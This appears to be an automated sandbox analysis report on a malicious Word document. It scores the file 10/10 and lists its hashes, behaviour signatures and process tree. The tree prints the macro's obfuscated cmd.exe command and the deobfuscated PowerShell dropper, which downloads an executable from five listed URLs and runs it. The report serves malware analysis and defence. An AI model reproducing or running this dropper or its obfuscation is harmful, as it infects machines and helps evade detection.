Analysis

  • max time kernel
    172s
  • max time network
    223s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    31-07-2022 09:13

General

  • Target

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc

  • Size

    112KB

  • MD5

    bb7ac1a1873e29db1f7ad69aaf4a8127

  • SHA1

    e7a082ff41d8cc4a09d3f852c46cfb808659b476

  • SHA256

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

  • SHA512

    9bd8f53a8dc5bf852ce2b59f9ab697022679b1d167311c437bb56b6509a6a6c81aafd2092f88ec2e87eca5172fb022224b784d4238200a1cf33eace07ea575dd

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    • http://solvolab.com/sdB
    • http://kenstones.com/pR
    • http://benvisuals.com/S2hMkKS
    • http://www.clinicacirurgiaplasticasp.com.br/Jmz
    • http://pride.ge/0e40iT

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Windows\SYSTEM32\CMd.exe
      CMd /V/C"^s^e^t ^x^i^U^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^aer^b;^E^z^l^$^ ^m^e^t^I^-^e^kovn^I^;)^E^z^l$^ ^,^A^Q^L^$(^e^l^i^F^d^a^olnw^o^D^.^pr^Y^$^{^yrt^{)Cr^b^$^ n^i^ ^A^Q^L^$(^hc^a^er^o^f^;'^e^x^e^.^'+^p^JH^$^+^'^\^'^+c^i^l^b^u^p^:vn^e^$=^E^z^l^$^;^'^2^3^4^'^ ^=^ ^p^J^H^$^;)^'^@^'(^t^i^l^p^S^.'^T^i0^4^e^0/e^g^.^e^d^irp//^:^p^t^t^h^@^z^m^J/r^b^.^m^oc^.^p^s^ac^i^t^s^a^l^p^a^i^gr^ur^ic^acin^i^lc^.^w^w^w//^:^p^t^t^h^@^S^Kk^M^h2^S/^m^oc^.^s^l^a^us^ivn^e^b//^:^p^t^t^h^@R^p/^moc.^s^en^o^t^sn^e^k//^:^p^t^t^h^@^B^d^s/^moc^.^b^a^l^ov^lo^s//^:p^t^t^h^'=Cr^b^$;^tn^e^i^lC^b^e^W^.^t^eN^ ^tce^j^b^o^-^w^en^=^pr^Y^$^ ^l^l^e^h^sr^ewo^p&&^f^or /^L %^P ^in (^3^5^8^,^-^1,^0)^d^o ^s^e^t sX=!sX!!^x^i^U^5:~%^P,1!&&^i^f %^P=^=^0 c^a^l^l %sX:^~^4%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $Yrp=new-object Net.WebClient;$brC='http://solvolab.com/sdB@http://kenstones.com/pR@http://benvisuals.com/S2hMkKS@http://www.clinicacirurgiaplasticasp.com.br/Jmz@http://pride.ge/0e40iT'.Split('@');$HJp = '432';$lzE=$env:public+'\'+$HJp+'.exe';foreach($LQA in $brC){try{$Yrp.DownloadFile($LQA, $lzE);Invoke-Item $lzE;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3236

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/2172-146-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp (Filesize: 64KB)
  • memory/2172-130-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp (Filesize: 64KB)
  • memory/2172-133-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp (Filesize: 64KB)
  • memory/2172-134-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp (Filesize: 64KB)
  • memory/2172-143-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp (Filesize: 64KB)
  • memory/2172-136-0x00007FFF50640000-0x00007FFF50650000-memory.dmp (Filesize: 64KB)
  • memory/2172-132-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp (Filesize: 64KB)
  • memory/2172-131-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp (Filesize: 64KB)
  • memory/2172-135-0x00007FFF50640000-0x00007FFF50650000-memory.dmp (Filesize: 64KB)
  • memory/2172-144-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp (Filesize: 64KB)
  • memory/2172-145-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp (Filesize: 64KB)
  • memory/3236-139-0x000001F7EFD20000-0x000001F7EFD42000-memory.dmp (Filesize: 136KB)
  • memory/3236-141-0x00007FFF66C00000-0x00007FFF676C1000-memory.dmp (Filesize: 10.8MB)
  • memory/3236-140-0x00007FFF66C00000-0x00007FFF676C1000-memory.dmp (Filesize: 10.8MB)
  • memory/3236-147-0x00007FFF66C00000-0x00007FFF676C1000-memory.dmp (Filesize: 10.8MB)